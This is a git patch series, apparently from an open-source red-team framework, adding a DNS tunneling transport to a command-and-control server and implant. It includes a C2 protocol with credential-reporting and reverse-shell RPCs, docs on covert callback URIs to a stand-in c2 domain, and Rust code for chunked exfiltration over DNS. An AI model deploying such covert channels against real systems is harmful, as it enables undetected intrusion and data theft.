\x01(\x0e2\x11.c2.Host.PlatformR\bplatform\x12\x1d\n" + + "\n" + + "primary_ip\x18\x04 \x01(\tR\tprimaryIp\"t\n" + + "\bPlatform\x12\x18\n" + + "\x14PLATFORM_UNSPECIFIED\x10\x00\x12\x14\n" + + "\x10PLATFORM_WINDOWS\x10\x01\x12\x12\n" + + "\x0ePLATFORM_LINUX\x10\x02\x12\x12\n" + + "\x0ePLATFORM_MACOS\x10\x03\x12\x10\n" + + "\fPLATFORM_BSD\x10\x04\"Y\n" + + "\x04Task\x12\x0e\n" + + "\x02id\x18\x01 \x01(\x03R\x02id\x12\"\n" + + "\x04tome\x18\x02 \x01(\v2\x0e.eldritch.TomeR\x04tome\x12\x1d\n" + + "\n" + + "quest_name\x18\x03 \x01(\tR\tquestName\"\x1d\n" + + "\tTaskError\x12\x10\n" + + "\x03msg\x18\x01 \x01(\tR\x03msg\"\xe3\x01\n" + + "\n" + + "TaskOutput\x12\x0e\n" + + "\x02id\x18\x01 \x01(\x03R\x02id\x12\x16\n" + + 
"\x06output\x18\x02 \x01(\tR\x06output\x12#\n" + + "\x05error\x18\x03 \x01(\v2\r.c2.TaskErrorR\x05error\x12B\n" + + "\x0fexec_started_at\x18\x04 \x01(\v2\x1a.google.protobuf.TimestampR\rexecStartedAt\x12D\n" + + "\x10exec_finished_at\x18\x05 \x01(\v2\x1a.google.protobuf.TimestampR\x0eexecFinishedAt\"7\n" + + "\x11ClaimTasksRequest\x12\"\n" + + "\x06beacon\x18\x01 \x01(\v2\n" + + ".c2.BeaconR\x06beacon\"4\n" + + "\x12ClaimTasksResponse\x12\x1e\n" + + "\x05tasks\x18\x01 \x03(\v2\b.c2.TaskR\x05tasks\"'\n" + + "\x11FetchAssetRequest\x12\x12\n" + + "\x04name\x18\x01 \x01(\tR\x04name\"*\n" + + "\x12FetchAssetResponse\x12\x14\n" + + "\x05chunk\x18\x01 \x01(\fR\x05chunk\"h\n" + + "\x17ReportCredentialRequest\x12\x17\n" + + "\atask_id\x18\x01 \x01(\x03R\x06taskId\x124\n" + + "\n" + + "credential\x18\x02 \x01(\v2\x14.eldritch.CredentialR\n" + + "credential\"\x1a\n" + + "\x18ReportCredentialResponse\"R\n" + + "\x11ReportFileRequest\x12\x17\n" + + "\atask_id\x18\x01 \x01(\x03R\x06taskId\x12$\n" + + "\x05chunk\x18\x02 \x01(\v2\x0e.eldritch.FileR\x05chunk\"\x14\n" + + "\x12ReportFileResponse\"^\n" + + "\x18ReportProcessListRequest\x12\x17\n" + + "\atask_id\x18\x01 \x01(\x03R\x06taskId\x12)\n" + + "\x04list\x18\x02 \x01(\v2\x15.eldritch.ProcessListR\x04list\"\x1b\n" + + "\x19ReportProcessListResponse\"A\n" + + "\x17ReportTaskOutputRequest\x12&\n" + + "\x06output\x18\x01 \x01(\v2\x0e.c2.TaskOutputR\x06output\"\x1a\n" + + "\x18ReportTaskOutputResponse\"s\n" + + "\x13ReverseShellRequest\x12/\n" + + "\x04kind\x18\x01 \x01(\x0e2\x1b.c2.ReverseShellMessageKindR\x04kind\x12\x12\n" + + "\x04data\x18\x02 \x01(\fR\x04data\x12\x17\n" + + "\atask_id\x18\x03 \x01(\x03R\x06taskId\"[\n" + + "\x14ReverseShellResponse\x12/\n" + + "\x04kind\x18\x01 \x01(\x0e2\x1b.c2.ReverseShellMessageKindR\x04kind\x12\x12\n" + + "\x04data\x18\x02 \x01(\fR\x04data*\x8f\x01\n" + + "\x17ReverseShellMessageKind\x12*\n" + + "&REVERSE_SHELL_MESSAGE_KIND_UNSPECIFIED\x10\x00\x12#\n" + + 
"\x1fREVERSE_SHELL_MESSAGE_KIND_DATA\x10\x01\x12#\n" + + "\x1fREVERSE_SHELL_MESSAGE_KIND_PING\x10\x022\xfc\x03\n" + + "\x02C2\x12=\n" + + "\n" + + "ClaimTasks\x12\x15.c2.ClaimTasksRequest\x1a\x16.c2.ClaimTasksResponse\"\x00\x12=\n" + + "\n" + + "FetchAsset\x12\x15.c2.FetchAssetRequest\x1a\x16.c2.FetchAssetResponse0\x01\x12M\n" + + "\x10ReportCredential\x12\x1b.c2.ReportCredentialRequest\x1a\x1c.c2.ReportCredentialResponse\x12=\n" + + "\n" + + "ReportFile\x12\x15.c2.ReportFileRequest\x1a\x16.c2.ReportFileResponse(\x01\x12P\n" + + "\x11ReportProcessList\x12\x1c.c2.ReportProcessListRequest\x1a\x1d.c2.ReportProcessListResponse\x12O\n" + + "\x10ReportTaskOutput\x12\x1b.c2.ReportTaskOutputRequest\x1a\x1c.c2.ReportTaskOutputResponse\"\x00\x12G\n" + + "\fReverseShell\x12\x17.c2.ReverseShellRequest\x1a\x18.c2.ReverseShellResponse\"\x00(\x010\x01B#Z!realm.pub/tavern/internal/c2/c2pbb\x06proto3" var ( file_c2_proto_rawDescOnce sync.Once diff --git a/tavern/internal/c2/proto/c2.proto b/tavern/internal/c2/proto/c2.proto index 8fc5cf5b3..8ef213c85 100644 --- a/tavern/internal/c2/proto/c2.proto +++ b/tavern/internal/c2/proto/c2.proto @@ -29,6 +29,7 @@ message Beacon { TRANSPORT_UNSPECIFIED = 0; TRANSPORT_GRPC = 1; TRANSPORT_HTTP1 = 2; + TRANSPORT_DNS = 3; } Transport transport = 6; diff --git a/tavern/internal/ent/beacon/beacon.go b/tavern/internal/ent/beacon/beacon.go index d899a6428..d0803c2cb 100644 --- a/tavern/internal/ent/beacon/beacon.go +++ b/tavern/internal/ent/beacon/beacon.go @@ -128,7 +128,7 @@ var ( // TransportValidator is a validator for the "transport" field enum values. It is called by the builders before save. 
func TransportValidator(t c2pb.Beacon_Transport) error { switch t.String() { - case "TRANSPORT_GRPC", "TRANSPORT_HTTP1", "TRANSPORT_UNSPECIFIED": + case "TRANSPORT_GRPC", "TRANSPORT_HTTP1", "TRANSPORT_DNS", "TRANSPORT_UNSPECIFIED": return nil default: return fmt.Errorf("beacon: invalid enum value for transport field: %q", t) From 04bbaf6955f3052c7972b03e22bd4c93d2f5b01a Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Wed, 24 Dec 2025 22:24:03 -0600 Subject: [PATCH 09/17] more updates --- docs/_docs/admin-guide/tavern.md | 7 + docs/_docs/user-guide/imix.md | 52 +- implants/lib/pb/src/generated/dns.rs | 6 +- implants/lib/transport/Cargo.toml | 1 + implants/lib/transport/src/dns.rs | 1044 ++++++++++++++---- tavern/internal/c2/dnspb/dns.pb.go | 6 +- tavern/internal/c2/proto/dns.proto | 6 +- tavern/internal/redirectors/dns/dns.go | 122 +-- tavern/internal/redirectors/dns/dns_test.go | 1085 +++++++++++++++---- 9 files changed, 1790 insertions(+), 539 deletions(-) diff --git a/docs/_docs/admin-guide/tavern.md b/docs/_docs/admin-guide/tavern.md index a924b87ce..01ef40c5c 100644 --- a/docs/_docs/admin-guide/tavern.md +++ b/docs/_docs/admin-guide/tavern.md @@ -155,6 +155,13 @@ tavern redirector --transport dns --listen "0.0.0.0:53?domain=c2.example.com&dom 2. Or run the redirector as your authoritative DNS server for the domain 3. 
Ensure UDP port 53 is accessible +**Server Behavior:** + +- **Benign responses**: Non-C2 queries to A records return `0.0.0.0` instead of NXDOMAIN to avoid breaking recursive DNS lookups (e.g., when using Cloudflare as an intermediary) +- **Conversation tracking**: The server tracks up to 10,000 concurrent conversations +- **Timeout management**: Conversations timeout after 15 minutes of inactivity (reduced to 5 minutes when at capacity) +- **Maximum data size**: 50MB per request + See the [DNS Transport Configuration](/user-guide/imix#dns-transport-configuration) section in the Imix user guide for more details on agent-side configuration. ### gRPC Redirector diff --git a/docs/_docs/user-guide/imix.md b/docs/_docs/user-guide/imix.md index 648f39dbd..b9766887c 100644 --- a/docs/_docs/user-guide/imix.md +++ b/docs/_docs/user-guide/imix.md @@ -182,31 +182,59 @@ cargo build --release --lib --target=x86_64-pc-windows-gnu ## DNS Transport Configuration -The DNS transport enables covert C2 communication by tunneling traffic through DNS queries and responses. This transport supports multiple DNS record types (TXT, A, AAAA) and can use either a specific DNS server or the system's default resolver. +The DNS transport enables covert C2 communication by tunneling traffic through DNS queries and responses. This transport supports multiple DNS record types (TXT, A, AAAA) and can use either specific DNS servers or the system's default resolver with automatic fallback. 
### DNS URI Format When using the DNS transport, configure `IMIX_CALLBACK_URI` with the following format: ``` -dns:///[?type=&fallback=] +dns://?domain=[&type=] ``` **Parameters:** -- `` - DNS server IP address, or `*` to use system resolver (recommended) -- `` - Base domain for DNS queries (e.g., `c2.example.com` will result in queries like `abcd1234.c2.example.com`) -- `type` (optional) - Preferred DNS record type: `TXT` (default), `A`, or `AAAA` -- `fallback` (optional) - Enable automatic fallback to other record types on failure (default: `true`) +- `` - DNS server address(es), `*` to use system resolver, or comma-separated list (e.g., `8.8.8.8:53,1.1.1.1:53`) +- `domain` - Base domain for DNS queries (e.g., `c2.example.com`) +- `type` (optional) - DNS record type: `txt` (default), `a`, or `aaaa` **Examples:** ```bash -# Use specific DNS server (8.8.8.8) with TXT records and fallback enabled -export IMIX_CALLBACK_URI="dns://8.8.8.8/c2.example.com" +# Use specific DNS server with TXT records (default) +export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com" -# Use system resolver, prefer A records only -export IMIX_CALLBACK_URI="dns://*/c2.example.com?type=A" +# Use system resolver with fallbacks +export IMIX_CALLBACK_URI="dns://*?domain=c2.example.com" -# Use system resolver with AAAA records and no fallback -export IMIX_CALLBACK_URI="dns://*/c2.example.com?type=AAAA&fallback=false" +# Use multiple DNS servers with A records +export IMIX_CALLBACK_URI="dns://8.8.8.8:53,1.1.1.1:53?domain=c2.example.com&type=a" + +# Use AAAA records +export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com&type=aaaa" ``` + +### DNS Resolver Fallback + +When using `*` as the server, the agent uses system DNS servers followed by public resolvers (1.1.1.1, 8.8.8.8) as fallbacks. If system configuration cannot be read, only the public resolvers are used. 
When multiple servers are configured, the agent tries each server in order on every failed request until one succeeds, then uses the working server for subsequent requests. + +### Record Types + +| Type | Description | Use Case | +|------|-------------|----------| +| TXT | Text records (default) | Best throughput, data encoded in TXT RDATA | +| A | IPv4 address records | Lower profile, data encoded across multiple A records | +| AAAA | IPv6 address records | Medium profile, more data per record than A | + +### Protocol Details + +The DNS transport uses an async windowed protocol to handle UDP unreliability: + +- **Chunked transmission**: Large requests are split into chunks that fit within DNS query limits (253 bytes total domain length) +- **Windowed sending**: Up to 10 packets are sent concurrently +- **ACK/NACK protocol**: The server responds with acknowledgments for received chunks and requests retransmission of missing chunks +- **Automatic retries**: Failed chunks are retried up to 3 times before the request fails +- **CRC32 verification**: Data integrity is verified using CRC32 checksums + +**Limits:** +- Maximum data size: 50MB per request +- Maximum concurrent conversations on server: 10,000 diff --git a/implants/lib/pb/src/generated/dns.rs b/implants/lib/pb/src/generated/dns.rs index 67665d669..7797109c5 100644 --- a/implants/lib/pb/src/generated/dns.rs +++ b/implants/lib/pb/src/generated/dns.rs @@ -7,10 +7,10 @@ pub struct DnsPacket { /// Packet type #[prost(enumeration = "PacketType", tag = "1")] pub r#type: i32, - /// Chunk sequence number (0-based) + /// Chunk sequence number (0-Based for INIT, 1-based for DATA) #[prost(uint32, tag = "2")] pub sequence: u32, - /// 12-character random conversation ID + /// 8-character random conversation ID #[prost(string, tag = "3")] pub conversation_id: ::prost::alloc::string::String, /// Chunk payload (or InitPayload for INIT packets) @@ -65,7 +65,7 @@ pub struct InitPayload { 
#[allow(clippy::derive_partial_eq_without_eq)] #[derive(Clone, PartialEq, ::prost::Message)] pub struct FetchPayload { - /// Which chunk to fetch (0-based) + /// Which chunk to fetch (1-based) #[prost(uint32, tag = "1")] pub chunk_index: u32, } diff --git a/implants/lib/transport/Cargo.toml b/implants/lib/transport/Cargo.toml index 71fb52a1c..bb225e2b0 100644 --- a/implants/lib/transport/Cargo.toml +++ b/implants/lib/transport/Cargo.toml @@ -16,6 +16,7 @@ pb = { workspace = true } anyhow = { workspace = true } bytes = { workspace = true } +futures = { workspace = true } log = { workspace = true } prost = { workspace = true } prost-types = { workspace = true } diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs index e9697c4a7..32ee0ee0e 100644 --- a/implants/lib/transport/src/dns.rs +++ b/implants/lib/transport/src/dns.rs @@ -1,8 +1,5 @@ -// DNS transport implementation for Realm C2 -// This module provides DNS-based communication with stateless packet protocol - use crate::Transport; -use anyhow::Result; +use anyhow::{Context, Result}; use pb::c2::*; use pb::dns::*; use prost::Message; @@ -200,7 +197,7 @@ impl DNS { } } - Err(last_error.unwrap_or_else(|| anyhow::anyhow!("All DNS servers failed"))) + Err(last_error.unwrap_or_else(|| anyhow::anyhow!("all DNS servers failed"))) } /// Try a single DNS query against a specific server @@ -222,7 +219,8 @@ impl DNS { let timeout_duration = std::time::Duration::from_secs(5); let len = tokio::time::timeout(timeout_duration, socket.recv(&mut buf)) .await - .map_err(|_| anyhow::anyhow!("DNS query timeout"))??; + .map_err(|_| anyhow::anyhow!("timeout")) + .context("DNS query timeout")??; buf.truncate(len); // Parse and validate response @@ -233,7 +231,7 @@ impl DNS { fn build_dns_query(&self, domain: &str) -> Result<(Vec, u16)> { let mut query = Vec::new(); - // Transaction ID (random for security) + // Transaction ID let txid = rand::random::(); query.extend_from_slice(&txid.to_be_bytes()); // 
Flags: standard query @@ -357,19 +355,19 @@ impl DNS { all_data.pop(); } - let encoded_str = String::from_utf8(all_data) - .map_err(|e| anyhow::anyhow!("Invalid UTF-8 in A/AAAA response: {}", e))?; + let encoded_str = + String::from_utf8(all_data).context("invalid UTF-8 in A/AAAA response")?; all_data = base32::decode( base32::Alphabet::Rfc4648 { padding: false }, &encoded_str.to_uppercase(), ) - .ok_or_else(|| anyhow::anyhow!("Failed to decode base32 from A/AAAA records"))?; + .ok_or_else(|| anyhow::anyhow!("base32 decode failed")) + .context("failed to decode base32 from A/AAAA records")?; } Ok(all_data) } - /// Send request and receive response using DNS protocol async fn dns_exchange(&mut self, request: Req, method_code: &str) -> Result where Req: Message + Send + 'static, @@ -383,15 +381,8 @@ impl DNS { Self::unmarshal_with_codec::(&response_data) } - /// Send raw request bytes and receive raw response bytes using DNS protocol with async transmission - /// Uses windowed transmission with ACK/NACK-based retransmission - async fn dns_exchange_raw( - &mut self, - request_data: Vec, - method_code: &str, - ) -> Result> { - use std::collections::{HashMap, HashSet}; - + /// Validate request data and calculate optimal chunking strategy + fn validate_and_prepare_chunks(&self, request_data: &[u8]) -> Result<(usize, usize, u32)> { // Validate data size if request_data.len() > MAX_DATA_SIZE { return Err(anyhow::anyhow!( @@ -423,7 +414,7 @@ impl DNS { } } - // Fallback for very large data (shouldn't happen with 50MB limit) + // Fallback for very large data result.unwrap_or_else(|| { let chunk_size = self.calculate_max_chunk_size(2097151); let total_chunks = ((request_data.len() + chunk_size - 1) / chunk_size).max(1); @@ -431,7 +422,7 @@ impl DNS { }) }; - let data_crc = Self::calculate_crc32(&request_data); + let data_crc = Self::calculate_crc32(request_data); log::debug!( "DNS: Request size={} bytes, chunks={}, chunk_size={} bytes, crc32={:#x}", @@ -441,26 +432,36 @@ impl 
DNS { data_crc ); - // Generate conversation ID - let conv_id = Self::generate_conv_id(); + Ok((chunk_size, total_chunks, data_crc)) + } - // Send INIT packet + /// Send INIT packet to start a new conversation + async fn send_init_packet( + &mut self, + conv_id: &str, + method_code: &str, + total_chunks: usize, + data_size: usize, + data_crc: u32, + ) -> Result<()> { let init_payload = InitPayload { method_code: method_code.to_string(), total_chunks: total_chunks as u32, data_crc32: data_crc, - file_size: request_data.len() as u32, + file_size: data_size as u32, }; let mut init_payload_bytes = Vec::new(); init_payload.encode(&mut init_payload_bytes)?; - log::debug!("DNS: INIT packet - conv_id={}, method={}, total_chunks={}, file_size={}, data_crc32={:#x}", - conv_id, method_code, total_chunks, request_data.len(), data_crc); + log::debug!( + "DNS: INIT packet - conv_id={}, method={}, total_chunks={}, file_size={}, data_crc32={:#x}", + conv_id, method_code, total_chunks, data_size, data_crc + ); let init_packet = DnsPacket { r#type: PacketType::Init.into(), sequence: 0, - conversation_id: conv_id.clone(), + conversation_id: conv_id.to_string(), data: init_payload_bytes, crc32: 0, window_size: SEND_WINDOW_SIZE as u32, @@ -468,119 +469,173 @@ impl DNS { nacks: vec![], }; - match self.send_packet(init_packet).await { - Ok(_) => { - log::debug!("DNS: INIT sent for conv_id={}", conv_id); - } - Err(e) => { - return Err(anyhow::anyhow!( - "Failed to send INIT packet to DNS server: {}.", - e - )); + self.send_packet(init_packet) + .await + .context("failed to send INIT packet")?; + log::debug!("DNS: INIT sent for conv_id={}", conv_id); + + Ok(()) + } + + /// Process a single chunk response and extract ACKs/NACKs + fn process_chunk_response( + response_data: &[u8], + seq_num: u32, + total_chunks: usize, + ) -> Result<(Vec, Vec)> { + let mut acks = Vec::new(); + let mut nacks = Vec::new(); + + if let Ok(status_packet) = DnsPacket::decode(response_data) { + if 
status_packet.r#type == PacketType::Status.into() { + // Process ACKs - collect acknowledged sequences + for ack_range in &status_packet.acks { + for ack_seq in ack_range.start_seq..=ack_range.end_seq { + acks.push(ack_seq); + } + } + + // Process NACKs - collect sequences needing retransmission + for &nack_seq in &status_packet.nacks { + if nack_seq >= 1 && nack_seq <= total_chunks as u32 { + nacks.push(nack_seq); + } + } } + } else { + log::debug!( + "DNS: Unknown response format ({} bytes), retrying chunk", + response_data.len() + ); + nacks.push(seq_num); } - // Async windowed transmission - let mut acknowledged = HashSet::new(); // Fully acknowledged chunks - let mut nack_set = HashSet::new(); - let mut retry_counts: HashMap = HashMap::new(); + Ok((acks, nacks)) + } - // Prepare chunks - let chunks: Vec> = request_data - .chunks(chunk_size) - .map(|chunk| chunk.to_vec()) - .collect(); + /// Send data chunks concurrently with windowed transmission + async fn send_data_chunks_concurrent( + &mut self, + chunks: &[Vec], + conv_id: &str, + total_chunks: usize, + ) -> Result<(std::collections::HashSet, std::collections::HashSet)> { + use std::collections::HashSet; + + let mut acknowledged = HashSet::new(); + let mut nack_set = HashSet::new(); + let mut send_tasks = Vec::new(); - // Send all chunks and collect ACKs/NACKs - // In async mode, each DATA packet gets immediate STATUS response via DNS request-response for seq in 1..=total_chunks { let seq_u32 = seq as u32; - // Skip if already acknowledged if acknowledged.contains(&seq_u32) { continue; } - let chunk = &chunks[seq - 1]; - - let data_packet = DnsPacket { - r#type: PacketType::Data.into(), - sequence: seq_u32, - conversation_id: conv_id.clone(), - data: chunk.clone(), - crc32: Self::calculate_crc32(chunk), - window_size: SEND_WINDOW_SIZE as u32, - acks: vec![], - nacks: vec![], - }; - - // Send DATA packet and get STATUS response - match self.send_packet(data_packet).await { - Ok(response_data) => { - // The 
response could be: - // 1. A marshaled STATUS packet (protobuf) - // 2. Plain "ok" string (backward compat) - // 3. Error response - - // Try to parse as STATUS packet (protobuf) - if let Ok(status_packet) = DnsPacket::decode(&response_data[..]) { - if status_packet.r#type == PacketType::Status.into() { - // Process ACKs - mark as acknowledged - for ack_range in &status_packet.acks { - for ack_seq in ack_range.start_seq..=ack_range.end_seq { - acknowledged.insert(ack_seq); - retry_counts.remove(&ack_seq); - } - } - - // Process NACKs - queue for retransmission - for &nack_seq in &status_packet.nacks { - if nack_seq >= 1 && nack_seq <= total_chunks as u32 { - nack_set.insert(nack_seq); - } - } - } - } else if response_data == b"ok" { - // Legacy "ok" response - assume this chunk was accepted - acknowledged.insert(seq_u32); - } else { - // Unknown response format - assume need to retry this chunk - log::debug!( - "DNS: Unknown response format ({} bytes), retrying chunk", - response_data.len() - ); - nack_set.insert(seq_u32); + let chunk = chunks[seq - 1].clone(); + let conv_id_clone = conv_id.to_string(); + let mut transport_clone = self.clone(); + + // Spawn concurrent task for this packet + let task = tokio::spawn(async move { + let data_packet = DnsPacket { + r#type: PacketType::Data.into(), + sequence: seq_u32, + conversation_id: conv_id_clone, + data: chunk.clone(), + crc32: Self::calculate_crc32(&chunk), + window_size: SEND_WINDOW_SIZE as u32, + acks: vec![], + nacks: vec![], + }; + + let result = transport_clone.send_packet(data_packet).await; + (seq_u32, result) + }); + + send_tasks.push(task); + + // Limit concurrent tasks to SEND_WINDOW_SIZE + if send_tasks.len() >= SEND_WINDOW_SIZE { + if let Some(task) = send_tasks.first_mut() { + if let Ok(task_result) = task.await { + self.handle_chunk_task_result( + task_result, + &mut acknowledged, + &mut nack_set, + total_chunks, + )?; } + send_tasks.remove(0); } - Err(e) => { - // DNS query failed - check if it's a 
size issue or transient error - let err_msg = e.to_string(); - eprintln!("DNS ERROR: Failed to send chunk {}: {}", seq_u32, err_msg); - - // If packet is too long, this is a fatal error (can't fix with retries) - if err_msg.contains("DNS query too long") { - return Err(anyhow::anyhow!( - "Chunk {} is too large to fit in DNS query: {}", - seq_u32, - err_msg - )); - } + } + } - // Check for connection/network errors - if err_msg.contains("timeout") - || err_msg.contains("refused") - || err_msg.contains("unreachable") - { - eprintln!("DNS ERROR: Connection to DNS server failed."); - } + // Wait for all remaining tasks to complete + for task in send_tasks { + if let Ok(task_result) = task.await { + self.handle_chunk_task_result( + task_result, + &mut acknowledged, + &mut nack_set, + total_chunks, + )?; + } + } + + Ok((acknowledged, nack_set)) + } + + /// Handle the result of a chunk transmission task + fn handle_chunk_task_result( + &self, + task_result: (u32, Result>), + acknowledged: &mut std::collections::HashSet, + nack_set: &mut std::collections::HashSet, + total_chunks: usize, + ) -> Result<()> { + match task_result { + (seq_num, Ok(response_data)) => { + let (acks, nacks) = + Self::process_chunk_response(&response_data, seq_num, total_chunks)?; + acknowledged.extend(acks); + nack_set.extend(nacks); + } + (seq_num, Err(e)) => { + let err_msg = e.to_string(); + #[cfg(debug_assertions)] + log::error!("Failed to send chunk {}: {}", seq_num, err_msg); - // Otherwise, mark for retry (transient network error) - nack_set.insert(seq_u32); + // If packet is too long, this is a fatal error + if err_msg.contains("DNS query too long") { + return Err(anyhow::anyhow!( + "Chunk {} is too large to fit in DNS query: {}", + seq_num, + err_msg + )); } + + // Otherwise, mark for retry + nack_set.insert(seq_num); } } + Ok(()) + } + + /// Retry NACKed chunks with retry limit + async fn retry_nacked_chunks( + &mut self, + chunks: &[Vec], + conv_id: &str, + total_chunks: usize, + mut 
nack_set: std::collections::HashSet, + acknowledged: &mut std::collections::HashSet, + ) -> Result<()> { + use std::collections::HashMap; + + let mut retry_counts: HashMap = HashMap::new(); - // Retry NACKed chunks while !nack_set.is_empty() { let nacks_to_retry: Vec = nack_set.drain().collect(); @@ -595,7 +650,7 @@ impl DNS { } *retries += 1; - // Skip if already acknowledged (may have been ACKed in another response) + // Skip if already acknowledged if acknowledged.contains(&nack_seq) { continue; } @@ -604,7 +659,7 @@ impl DNS { let retransmit_packet = DnsPacket { r#type: PacketType::Data.into(), sequence: nack_seq, - conversation_id: conv_id.clone(), + conversation_id: conv_id.to_string(), data: chunk.clone(), crc32: Self::calculate_crc32(chunk), window_size: SEND_WINDOW_SIZE as u32, @@ -614,26 +669,19 @@ impl DNS { match self.send_packet(retransmit_packet).await { Ok(response_data) => { - // Parse STATUS response - if let Ok(status_packet) = DnsPacket::decode(&response_data[..]) { - if status_packet.r#type == PacketType::Status.into() { - // Process ACKs - for ack_range in &status_packet.acks { - for ack_seq in ack_range.start_seq..=ack_range.end_seq { - acknowledged.insert(ack_seq); - retry_counts.remove(&ack_seq); - } - } - - // Process NACKs - for &new_nack in &status_packet.nacks { - if new_nack >= 1 - && new_nack <= total_chunks as u32 - && !acknowledged.contains(&new_nack) - { - nack_set.insert(new_nack); - } - } + let (acks, nacks) = + Self::process_chunk_response(&response_data, nack_seq, total_chunks)?; + + // Process ACKs + for ack_seq in acks { + acknowledged.insert(ack_seq); + retry_counts.remove(&ack_seq); + } + + // Process NACKs + for new_nack in nacks { + if !acknowledged.contains(&new_nack) { + nack_set.insert(new_nack); } } } @@ -646,30 +694,24 @@ impl DNS { } } - // Verify all chunks acknowledged - if acknowledged.len() != total_chunks { - return Err(anyhow::anyhow!( - "Not all chunks acknowledged after max retries: {}/{} chunks. 
Missing: {:?}", - acknowledged.len(), - total_chunks, - (1..=total_chunks as u32) - .filter(|seq| !acknowledged.contains(seq)) - .collect::>() - )); - } + Ok(()) + } + /// Fetch response from server, handling potentially chunked responses + async fn fetch_response( + &mut self, + conv_id: &str, + total_chunks: usize, + ) -> Result> { log::debug!( "DNS: All {} chunks acknowledged, sending FETCH", total_chunks ); - // All data sent and acknowledged - // Now request the response via FETCH (or END for backward compatibility) - // Send FETCH packet to get response let fetch_packet = DnsPacket { r#type: PacketType::Fetch.into(), sequence: (total_chunks + 1) as u32, - conversation_id: conv_id.clone(), + conversation_id: conv_id.to_string(), data: vec![], crc32: 0, window_size: 0, @@ -677,75 +719,119 @@ impl DNS { nacks: vec![], }; - let end_response = match self.send_packet(fetch_packet).await { - Ok(resp) => { - log::debug!("DNS: FETCH response received ({} bytes)", resp.len()); - resp - } - Err(e) => { - return Err(anyhow::anyhow!( - "Failed to fetch response from server: {}.", - e - )); - } - }; + let end_response = self + .send_packet(fetch_packet) + .await + .context("failed to fetch response from server")?; + log::debug!( + "DNS: FETCH response received ({} bytes)", + end_response.len() + ); // Validate response is not empty if end_response.is_empty() { return Err(anyhow::anyhow!("Server returned empty response.")); } - // Check if response contains ResponseMetadata (chunked response indicator) - if end_response.len() > 2 && end_response != b"ok" { - // Try to parse as ResponseMetadata (plain protobuf, not encrypted) - if let Ok(metadata) = ResponseMetadata::decode(&end_response[..]) { - // Response is chunked - fetch all chunks - let total_chunks = metadata.total_chunks as usize; - let expected_crc = metadata.data_crc32; - - // Fetch all encrypted response chunks and concatenate - let mut full_response = Vec::new(); - for chunk_idx in 1..=total_chunks { - // Create 
FetchPayload with 1-based chunk index - let fetch_payload = FetchPayload { - chunk_index: chunk_idx as u32, - }; - let mut fetch_payload_bytes = Vec::new(); - fetch_payload.encode(&mut fetch_payload_bytes)?; - - let fetch_packet = DnsPacket { - r#type: PacketType::Fetch.into(), - sequence: (total_chunks as u32 + 2 + chunk_idx as u32), - conversation_id: conv_id.clone(), - data: fetch_payload_bytes, - crc32: 0, - window_size: 0, - acks: vec![], - nacks: vec![], - }; + // Check if response is chunked + if let Ok(metadata) = ResponseMetadata::decode(&end_response[..]) { + if metadata.total_chunks > 0 { + return self.fetch_chunked_response(conv_id, total_chunks, &metadata).await; + } + } - // Each chunk is encrypted - get raw chunk data - let chunk_data = self.send_packet(fetch_packet).await?; - full_response.extend_from_slice(&chunk_data); - } + Ok(end_response) + } - // Verify CRC of the complete encrypted response - let actual_crc = Self::calculate_crc32(&full_response); - if actual_crc != expected_crc { - return Err(anyhow::anyhow!( - "Response CRC mismatch: expected {}, got {}", - expected_crc, - actual_crc - )); - } + /// Fetch and reassemble a chunked response from server + async fn fetch_chunked_response( + &mut self, + conv_id: &str, + base_sequence: usize, + metadata: &ResponseMetadata, + ) -> Result> { + let total_chunks = metadata.total_chunks as usize; + let expected_crc = metadata.data_crc32; + let mut full_response = Vec::new(); - // Return the complete reassembled encrypted response data - return Ok(full_response); - } + for chunk_idx in 1..=total_chunks { + let fetch_payload = FetchPayload { + chunk_index: chunk_idx as u32, + }; + let mut fetch_payload_bytes = Vec::new(); + fetch_payload.encode(&mut fetch_payload_bytes)?; + + let fetch_packet = DnsPacket { + r#type: PacketType::Fetch.into(), + sequence: (base_sequence as u32 + 2 + chunk_idx as u32), + conversation_id: conv_id.to_string(), + data: fetch_payload_bytes, + crc32: 0, + window_size: 0, + 
acks: vec![], + nacks: vec![], + }; + + let chunk_data = self.send_packet(fetch_packet).await?; + full_response.extend_from_slice(&chunk_data); } - // Single response (small enough to fit in one packet) - Ok(end_response) + let actual_crc = Self::calculate_crc32(&full_response); + if actual_crc != expected_crc { + return Err(anyhow::anyhow!( + "Response CRC mismatch: expected {}, got {}", + expected_crc, + actual_crc + )); + } + + Ok(full_response) + } + + async fn dns_exchange_raw( + &mut self, + request_data: Vec, + method_code: &str, + ) -> Result> { + // Validate and prepare chunks + let (chunk_size, total_chunks, data_crc) = self.validate_and_prepare_chunks(&request_data)?; + + // Generate conversation ID + let conv_id = Self::generate_conv_id(); + + // Send INIT packet + self.send_init_packet(&conv_id, method_code, total_chunks, request_data.len(), data_crc) + .await?; + + // Prepare chunks + let chunks: Vec> = request_data + .chunks(chunk_size) + .map(|chunk| chunk.to_vec()) + .collect(); + + // Send all chunks using concurrent windowed transmission + let (mut acknowledged, nack_set) = self + .send_data_chunks_concurrent(&chunks, &conv_id, total_chunks) + .await?; + + // Retry NACKed chunks + self.retry_nacked_chunks(&chunks, &conv_id, total_chunks, nack_set, &mut acknowledged) + .await?; + + // Verify all chunks acknowledged + if acknowledged.len() != total_chunks { + return Err(anyhow::anyhow!( + "Not all chunks acknowledged after max retries: {}/{} chunks. 
Missing: {:?}", + acknowledged.len(), + total_chunks, + (1..=total_chunks as u32) + .filter(|seq| !acknowledged.contains(seq)) + .collect::>() + )); + } + + // Fetch response from server + self.fetch_response(&conv_id, total_chunks).await } } @@ -761,9 +847,9 @@ impl Transport for DNS { fn new(callback: String, _proxy_uri: Option) -> Result { // Parse DNS URL formats: - // dns://server:port?domain=example.com&type=txt (single server, TXT records) - // dns://*?domain=example.com&type=a (use system DNS + fallbacks, A records) - // dns://8.8.8.8:53,1.1.1.1:53?domain=example.com&type=aaaa (multiple servers, AAAA records) + // dns://server:port?domain=dnsc2.realm.pub&type=txt (single server, TXT records) + // dns://*?domain=dnsc2.realm.pub&type=a (use system DNS + fallbacks, A records) + // dns://8.8.8.8:53,1.1.1.1:53?domain=dnsc2.realm.pub&type=aaaa (multiple servers, AAAA records) let url = if callback.starts_with("dns://") { callback } else { @@ -775,7 +861,12 @@ impl Transport 